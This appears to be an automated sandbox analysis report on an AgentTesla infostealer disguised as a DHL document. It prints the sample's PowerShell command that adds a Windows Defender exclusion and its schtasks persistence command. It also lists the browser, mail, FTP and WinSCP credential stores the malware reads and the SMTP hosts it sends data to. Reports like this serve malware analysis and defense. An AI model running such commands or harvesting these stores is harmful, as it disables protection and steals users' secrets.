                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1965
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7890
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeThread delayed: delay time: 36406
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: Dhl Document 7348255141.exe, 00000000.00000002.275750377.000000000245A000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: Dhl Document 7348255141.exe, 00000000.00000002.275750377.000000000245A000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Dhl Document 7348255141.exe, 00000000.00000002.275750377.000000000245A000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: Dhl Document 7348255141.exe, 00000000.00000002.275750377.000000000245A000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00C308B0 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dlBewoIRuDWOY" /XML "C:\Users\user\AppData\Local\Temp\tmpAE43.tmp
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: RegSvcs.exe, 00000007.00000002.525413602.00000000011C0000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
                      Source: RegSvcs.exe, 00000007.00000002.525413602.00000000011C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: RegSvcs.exe, 00000007.00000002.525413602.00000000011C0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: RegSvcs.exe, 00000007.00000002.525413602.00000000011C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeQueries volume information: C:\Users\user\Desktop\Dhl Document 7348255141.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Dhl Document 7348255141.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Dhl Document 7348255141.exe.352e4e0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Dhl Document 7348255141.exe.3564700.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Dhl Document 7348255141.exe.3564700.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Dhl Document 7348255141.exe.352e4e0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000000.273012990.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.518116034.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.273408189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.272519119.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.277404295.0000000003441000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.271895196.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Dhl Document 7348255141.exe PID: 4392, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6272, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: Yara matchFile source: 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6272, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Dhl Document 7348255141.exe.352e4e0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Dhl Document 7348255141.exe.3564700.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Dhl Document 7348255141.exe.3564700.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Dhl Document 7348255141.exe.352e4e0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000000.273012990.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.518116034.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.273408189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.272519119.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.277404295.0000000003441000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.271895196.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.526268969.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Dhl Document 7348255141.exe PID: 4392, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6272, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection12Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScheduled Task/Job1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSSecurity Software Discovery311Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection12DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 532892 Sample: Dhl Document 7348255141.exe Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 33 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->33 35 Found malware configuration 2->35 37 Multi AV Scanner detection for dropped file 2->37 39 11 other signatures 2->39 7 Dhl Document 7348255141.exe 7 2->7         started        process3 file4 23 C:\Users\user\AppData\...\dlBewoIRuDWOY.exe, PE32 7->23 dropped 25 C:\Users\user\AppData\Local\...\tmpAE43.tmp, XML 7->25 dropped 27 C:\Users\...\Dhl Document 7348255141.exe.log, ASCII 7->27 dropped 41 Adds a directory exclusion to Windows Defender 7->41 11 RegSvcs.exe 6 7->11         started        15 powershell.exe 25 7->15         started        17 schtasks.exe 1 7->17         started        signatures5 process6 dnsIp7 29 smtp.4plqroup.com 11->29 31 us2.smtp.mailhostbox.com 208.91.198.143, 49808, 49809, 587 PUBLIC-DOMAIN-REGISTRYUS United States 11->31 43 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->43 45 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 11->45 47 Tries to steal Mail credentials (via file / registry access) 11->47 49 3 other signatures 11->49 19 conhost.exe 15->19         started        21 conhost.exe 17->21         started        signatures8 process9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Dhl Document 7348255141.exe34%MetadefenderBrowse
                      Dhl Document 7348255141.exe66%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe34%MetadefenderBrowse
                      C:\Users\user\AppData\Roaming\dlBewoIRuDWOY.exe66%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      7.0.RegSvcs.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                      7.0.RegSvcs.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                      7.0.RegSvcs.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      7.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      7.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      7.0.RegSvcs.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://vDjxZe6kQogGh.org0%Avira URL Cloudsafe
                      http://smtp.4plqroup.com0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://aXZVkw.com0%Avira URL Cloudsafe
